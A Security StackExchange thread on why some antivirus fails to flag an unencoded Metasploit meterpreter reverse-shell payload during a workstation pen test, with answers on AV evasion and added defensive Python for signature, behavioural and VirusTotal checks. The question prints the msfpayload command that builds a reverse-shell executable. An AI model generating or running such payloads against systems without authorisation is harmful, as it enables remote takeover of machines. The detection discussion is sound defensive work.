
As part of a workstation pen test, I copy a simple metasploit payload onto the workstation, and try to run it. Usually this is blocked by anti-virus software. However, sometimes it isn't (I won't name the offenders). The AV software is running and correctly detects EICAR, but it doesn't detect a simple non-encoded metasploit payload.

My instinct is that this is a failure of the AV software, and should be reported as a vulnerability. However, I wondered if this behaviour might in fact be intended? Are there legitimate arguments that "metasploit is not a virus"?

In this case the payload is windows/meterpreter/reverse_tcp encoded as an exe file, without obfuscation. Generated using this command:

msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 X > payload.exe
paj28
  • Have you tried to run the payload? Sometimes the AV signature might fail (due to all the randomness in the payload), but once it is run the AV's runtime behaviour analysis detects it. – void_in Jan 30 '15 at 11:44
  • @void_in - yes, payload ran successfully, and I got a working meterpreter instance on my metasploit console – paj28 Jan 30 '15 at 11:59
  • That's signature-based detection for you! Have you tried it on virustotal.com? It will scan it with a bunch of AVs and tell you which ones think it's malware and which ones think it's clean. – Arlix Nov 27 '15 at 08:41
  • Could you state what version of Metasploit you are using? Free vs commercial makes a big difference in the detection since commercial performs AV avoidance as a benefit – Joe Nov 27 '15 at 09:44
  • @Joe - It was the free version, with no obfuscation – paj28 Nov 27 '15 at 09:56
  • And I had to work on getting an AV bypass: http://security.stackexchange.com/q/93499/8340. I suppose Metasploit can be used as a network admin tool (remote access). However, because of the way that it works (stealthily), it should be flagged as a vulnerability if it was able to be uploaded and executed. – SilverlightFox Nov 27 '15 at 16:23

3 Answers


The logical answer is that yes, since Metasploit is largely open source, all AV should detect and block Metasploit-generated modules if they are doing their jobs. Unfortunately, the reality is that it is incredibly hard to actually detect and block malicious code/executables even if it is generated with an open-source framework such as Metasploit. My take on the matter is simply that Metasploit had a new update and AV vendors have not created signatures for the newly generated payloads yet.

Here are some of the reasons:

  1. It is an arms race, as TimC mentioned. AV companies find ways to block malicious code via signatures and heuristic detection. This in turn lowers the effectiveness of products and tools designed to bypass AV, so new ways of bypassing AV are found and incorporated into the avoidance products. The developers and community contributors of Metasploit understand AV products exceedingly well and, with the constant updates, there are often new innovative techniques that will for a period of time avoid AV until the vendors catch up again.


  2. The defenders do not share information effectively, and this results in what is detected by one AV not getting flagged by another for quite some time, or ever. While work is progressing towards a standard (http://standards.ieee.org/develop/indconn/icsg/malware.html), business is business and a lot of vendors have their own proprietary standards, effectively hindering information sharing. A test by LastLine Labs showed just how long it can take for malware detection to be achieved by vendors. PLEASE NOTE: They used VirusTotal for the test, and this is NOT a real-world test, but it does provide interesting information. For more information regarding using VirusTotal for testing, see this: https://community.webroot.com/t5/Techie/Testing-antivirus-with-VirusTotal-is-a-bad-idea/td-p/62881. It basically boils down to not having the ability to use all detection mechanisms in the VirusTotal environment.


However, I wondered if this behaviour might in fact be intended? Are there legitimate arguments that "metasploit is not a virus"?

No AV vendor would willingly white list Metasploit and I am sure they would gladly classify it as a virus if they could. Proof of this is quite simple, try to install Metasploit on a machine with AV running!

Joe
  • You realize that Metasploit's obfuscation tools (like shikata_ga_nai) do not work very well, right? Metasploit Pro does have a proper obfuscator, though, which is guaranteed to remain undetected by popular antivirus software. – forest Mar 27 '18 at 02:34
  • @forest Shikata_ga_nai and other encoders were never meant to be used as obfuscators, as detailed in this post from Rapid7: https://blog.rapid7.com/2012/12/14/the-odd-couple-metasploit-and-antivirus-solutions/. Check the Encoder Myth section. Irrespective of their intended purpose, encoders did manage to help evade anti-virus solutions for a while until AV solutions adjusted. – Joe Mar 29 '18 at 10:00
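The two detection layers this thread keeps contrasting, a static byte signature (Joe's reason 1 above) and the runtime behaviour analysis void_in mentioned in the question's comments, side by side. This is an added example, not code from the question, from any answer, or from Rapid7; the signature bytes, the two sample files, the telemetry format, the user-writable-path markers, the allowlist and the 30-second window are all constructed assumptions for illustration. The only value taken from the page is the 1.2.3.4 LHOST.

```python
# Added example: static signature scan beside a behavioural correlation rule,
# both run over constructed data (nothing here comes from the page's own code).
import re
from datetime import datetime, timedelta

# Constructed "signature": the kind of byte pattern a signature engine keys on.
# Real engines use many such patterns plus heuristics; this one is invented.
SIGNATURES = {
    "constructed-loader-marker": b"CONSTRUCTED-LOADER\x90\x90\x90",
}

# Two constructed files: the same program once with the marker bytes intact and
# once with its bytes at rest altered, as a rebuild or an encoder would alter them.
SAMPLE_PLAIN = b"MZ" + b"\x00" * 16 + SIGNATURES["constructed-loader-marker"] + b"\x00" * 16
SAMPLE_VARIANT = b"MZ" + b"\x00" * 16 + b"C0NSTRUCTED-L0ADER\x90\x90\xcc" + b"\x00" * 16


def signature_hits(blob):
    """Names of signatures whose byte pattern occurs anywhere in the file."""
    return [name for name, pattern in SIGNATURES.items() if pattern in blob]


# Constructed endpoint telemetry (format invented for this example, loosely
# modelled on process-creation and network-connection events). 1.2.3.4 is the
# LHOST from the question; 198.51.100.10 stands in for a legitimate update server.
EVENTS = r"""
2015-01-30T11:44:01 PROCESS_CREATE pid=4120 image="C:\Users\alice\Downloads\payload.exe" parent="C:\Windows\explorer.exe"
2015-01-30T11:44:02 NET_CONNECT pid=4120 dst=1.2.3.4:4444 proto=tcp
2015-01-30T11:44:05 PROCESS_CREATE pid=4188 image="C:\Program Files\Mozilla Firefox\firefox.exe" parent="C:\Windows\explorer.exe"
2015-01-30T11:44:06 NET_CONNECT pid=4188 dst=198.51.100.10:443 proto=tcp
2015-01-30T11:45:00 PROCESS_CREATE pid=4300 image="C:\Users\alice\AppData\Local\Temp\installer.exe" parent="C:\Windows\explorer.exe"
2015-01-30T11:45:10 NET_CONNECT pid=4300 dst=198.51.100.10:443 proto=tcp
2015-01-30T11:50:30 NET_CONNECT pid=4120 dst=1.2.3.4:4444 proto=tcp
"""

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\appdata\\")  # assumed
ALLOWED_DESTINATIONS = {"198.51.100.10:443"}  # constructed allowlist
CONNECT_WINDOW = timedelta(seconds=30)  # assumed threshold


def parse_event(line):
    """Split one telemetry line into a dict of fields plus parsed timestamp and kind."""
    timestamp, kind, rest = line.split(" ", 2)
    event = {key: value.strip('"') for key, value in KV_RE.findall(rest)}
    event["ts"] = datetime.fromisoformat(timestamp)
    event["kind"] = kind
    return event


def behavioural_alerts(lines):
    """Flag a process started from a user-writable directory that opens an
    outbound connection to a non-allowlisted host soon after it starts.
    The rule never looks at file bytes, so the plain and variant samples
    are treated identically once they run."""
    started = {}  # pid -> (image path, creation time)
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        if event["kind"] == "PROCESS_CREATE":
            started[event["pid"]] = (event["image"], event["ts"])
        elif event["kind"] == "NET_CONNECT" and event["pid"] in started:
            image, created_at = started[event["pid"]]
            from_user_dir = any(marker in image.lower() for marker in USER_WRITABLE_MARKERS)
            soon_after_start = event["ts"] - created_at <= CONNECT_WINDOW
            if from_user_dir and soon_after_start and event["dst"] not in ALLOWED_DESTINATIONS:
                alerts.append({"ts": event["ts"].isoformat(), "pid": event["pid"],
                               "image": image, "dst": event["dst"]})
    return alerts


if __name__ == "__main__":
    for name, sample in (("plain", SAMPLE_PLAIN), ("variant", SAMPLE_VARIANT)):
        print(f"static scan of {name} sample: {signature_hits(sample) or 'no signature match'}")
    for alert in behavioural_alerts(EVENTS.splitlines()):
        print("behavioural alert:", alert)
```

The static scan matches the plain sample and misses the variant whose bytes differ, which is the gap the question's unencoded payload fell into; the behavioural rule fires once, on the callback from the Downloads folder to 1.2.3.4:4444, and stays quiet for the browser and for the installer talking to the allowlisted host. When writing up a finding like the one in the question, it helps to record which of these layers the product has (and which one failed), since "AV did not stop it" can mean a missing signature or a missing runtime check.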

It's an arms race. The developers of metasploit want to develop plugins that defeat anti-virus. The developers of anti-virus want to defeat metasploit plugins.

They can't both be successful, so sometimes the AV will roll out signatures that detect all metasploit modules, sometimes the metasploit developers will find a new way to evade AV.

You'd think that the AV vendors had the advantage due to metasploit being open-source, but obviously not in this case.

TimC
  • Thanks for the answer. However, in this case I wasn't using any obfuscation at all - metasploit wasn't even trying to hide the payload. – paj28 Jan 30 '15 at 11:59

It depends upon which version of Metasploit you are using. In the Metasploit Pro version, you can enjoy Dynamic Payloads, which can certainly evade antivirus.

According to Rapid7, Dynamic Payloads can:

• Evade the top 10 AV solutions in more than 90% of cases. No AV vendor detects all MSP payload options!

• Use error corrections to make sessions more stable than regular MSF sessions

• Encode the traffic when downloading the payload, which can help evade IPS

Try to upload the payload to VirusTotal to check whether other antivirus products are detecting the payload or not. If a good number of antivirus products are considering your payload a virus, that simply means that your antivirus is outdated. Try updating your virus definitions or changing your antivirus.

Sanidhay
  • It was the free version; no obfuscation or dynamic payloads were used. Virus scanner was up-to-date - just failed to detect. – paj28 Nov 27 '15 at 09:57
  • @paj28 Yes, I can understand. VirusTotal gives us a good example that many viruses go undetected by a number of antivirus products. – Sanidhay Nov 27 '15 at 10:00
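A way to do the VirusTotal check suggested above without handing the sample to every vendor: ask for the existing report by SHA-256 instead of uploading the file. This is an added example, not code from the answer or from VirusTotal; the endpoint `GET /api/v3/files/{sha256}` and the `x-apikey` header, `last_analysis_stats` and `last_analysis_results` fields are VirusTotal's documented v3 API, while the report dict, the engine names in it and the `VT_API_KEY` environment variable are constructed assumptions.

```python
# Added example: hash-based VirusTotal lookup with an offline report summary.
# Real API shape (v3 files endpoint, x-apikey header, last_analysis_* fields);
# the CONSTRUCTED_REPORT and its engine names are invented for the demo.
import hashlib
import json
import os
import sys
import urllib.error
import urllib.request

VT_FILE_URL = "https://www.virustotal.com/api/v3/files/{sha256}"


def file_sha256(data):
    """Hex SHA-256 of the file contents; VirusTotal keys file reports by this."""
    return hashlib.sha256(data).hexdigest()


def build_lookup_request(sha256, api_key):
    """GET /api/v3/files/{sha256} authenticated with the x-apikey header."""
    return urllib.request.Request(
        VT_FILE_URL.format(sha256=sha256),
        headers={"x-apikey": api_key, "accept": "application/json"},
    )


def summarize_report(report):
    """Reduce a v3 file report to detection counts and the engines that flagged it."""
    attributes = report["data"]["attributes"]
    stats = attributes["last_analysis_stats"]
    results = attributes.get("last_analysis_results", {})
    flagged_by = sorted(engine for engine, r in results.items()
                        if r.get("category") == "malicious")
    total = sum(stats.get(k, 0) for k in ("harmless", "malicious", "suspicious", "undetected"))
    return {"malicious": stats.get("malicious", 0), "total": total, "flagged_by": flagged_by}


def lookup_by_hash(data, api_key):
    """Fetch the existing report for a file; None when VirusTotal has never
    seen the hash (HTTP 404). Nothing is uploaded by this call."""
    request = build_lookup_request(file_sha256(data), api_key)
    try:
        with urllib.request.urlopen(request, timeout=30) as response:
            return json.load(response)
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return None
        raise


# Constructed stand-in for a v3 report: same field layout as the real response,
# invented engine names and counts.
CONSTRUCTED_REPORT = {
    "data": {
        "type": "file",
        "id": "<sha256 of the sample>",
        "attributes": {
            "last_analysis_stats": {"harmless": 0, "malicious": 38, "suspicious": 0,
                                    "undetected": 17, "timeout": 0},
            "last_analysis_results": {
                "ExampleEngineA": {"category": "malicious", "result": "Trojan.Constructed"},
                "ExampleEngineB": {"category": "undetected", "result": None},
                "ExampleEngineC": {"category": "malicious", "result": "Backdoor.Constructed"},
            },
        },
    }
}


if __name__ == "__main__":
    api_key = os.environ.get("VT_API_KEY")  # assumed environment variable name
    if len(sys.argv) == 2 and api_key:
        with open(sys.argv[1], "rb") as fh:
            report = lookup_by_hash(fh.read(), api_key)
        print(summarize_report(report) if report else "hash not known to VirusTotal")
    else:
        print("offline demo:", summarize_report(CONSTRUCTED_REPORT))
```

A hash lookup only tells you whether someone else already submitted that exact file, so a freshly built payload will usually come back unknown, and an upload is then the only way to get numbers. Either way the caveat from the Webroot link in Joe's answer applies: the counts reflect each engine's scan of the file on VirusTotal's infrastructure, not the runtime and cloud components a full product on the workstation would have used, so a clean VirusTotal result and a clean workstation result are different findings.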